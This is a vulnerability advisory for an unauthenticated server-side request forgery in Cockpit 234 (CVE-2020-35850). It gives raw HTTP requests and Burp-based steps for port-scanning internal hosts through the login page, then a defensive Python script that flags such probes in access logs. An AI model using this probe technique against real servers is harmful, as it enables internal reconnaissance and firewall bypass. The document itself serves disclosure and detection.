Cockpit-Project v234 - Server-Side Request Forgery Vulnerability (unauthenticated) CVE-2020-35850
- Cockpit version: 234
- OS: Ubuntu 18.04
- Page: login
An unauthenticated user can detect whether the SSH port, or any other port, is open on a server running the latest version of Cockpit. The vulnerability lets a user make the server send requests to internal hosts in order to detect open ports, so firewall configuration can be bypassed, or the server can be used as a gateway by a malicious user for port scanning. In addition, the user can induce the application to make a request back to the server that is hosting Cockpit. For example, if the system administrator creates an iptables rule that drops all packets arriving at port 22 (or another port), the user can still detect whether port 22 is open or not.
Assume there is an iptables rule under which port 22 is open for 127.0.0.1 (the loopback interface) but closed for all other interfaces.
First HTTP Request:
GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Second HTTP Request:
GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
Steps to reproduce:
On the login panel:
- Click Other Options.
- Enter 127.0.0.1 in the Connect to field and send the request with incorrect credentials.
- Intercept the request with Burp Suite.
- If the SSH service is open on port 22 and the credentials are wrong, the server returns a "401 Authentication Failed" response.
- If the user tries to connect to a port that accepts data for an SSH connection, the server returns a "401 Authentication failed: no-host" response after waiting 10 seconds.
- If the user tries to connect to a closed port, the server returns a "401 Authentication failed: no-host" response without waiting.
- If the SSH service is open on port 22 and the credentials are correct, the server returns a "200" response.
- By changing the remote port number, you can detect open ports on an internal server or on the loopback interface of the target server.
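A defender-side complement to the behaviour described above, added here as an example and not part of the original advisory or of the Cockpit project: the script parses access-log lines for the /cockpit+=HOST:PORT/login path form shown in the requests and flags login attempts whose connect-to host is loopback, link-local or private, which is the pattern of a port probe through the login page. It assumes Cockpit sits behind a reverse proxy that writes common-log-format access logs; the log lines, client addresses and function names (find_probes, classify_target) are constructed for the example.

```python
import ipaddress
import re

# Cockpit's login endpoint encodes the target host in the URL path as
# "/cockpit+=HOST:PORT/login" (the form shown in the requests above).
LOGIN_TARGET_RE = re.compile(r'"(?:GET|POST) /cockpit\+=(?P<host>[^:/\s]+):(?P<port>\d{1,5})/login ')

# Constructed access-log lines in common log format (not from a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /cockpit+=192.168.1.27:22/login HTTP/1.1" 401 0
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /cockpit+=127.0.0.1:22/login HTTP/1.1" 401 0
10.0.0.5 - - [01/Jan/2021:10:00:03 +0000] "GET /cockpit+=127.0.0.1:3306/login HTTP/1.1" 401 0
10.0.0.5 - - [01/Jan/2021:10:00:04 +0000] "GET /cockpit+=169.254.169.254:80/login HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2021:10:00:05 +0000] "GET /login HTTP/1.1" 200 1234
"""

def classify_target(host: str) -> str:
    """Label the host a login request asked Cockpit to connect to."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    return "public"

def find_probes(log_text: str, allowed_hosts: frozenset = frozenset()) -> list:
    """Return (client, host, port, label) for every login request whose
    connect-to host is not on the allow-list. A burst of these from one client,
    with only the port changing, is the behaviour the advisory describes."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_TARGET_RE.search(line)
        if not m:
            continue
        host, port = m.group("host"), int(m.group("port"))
        if host in allowed_hosts:
            continue
        client = line.split(" ", 1)[0]  # first field of common log format
        hits.append((client, host, port, classify_target(host)))
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

Hosts that administrators legitimately reach through the login page can be passed in allowed_hosts so only unexpected targets are reported.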
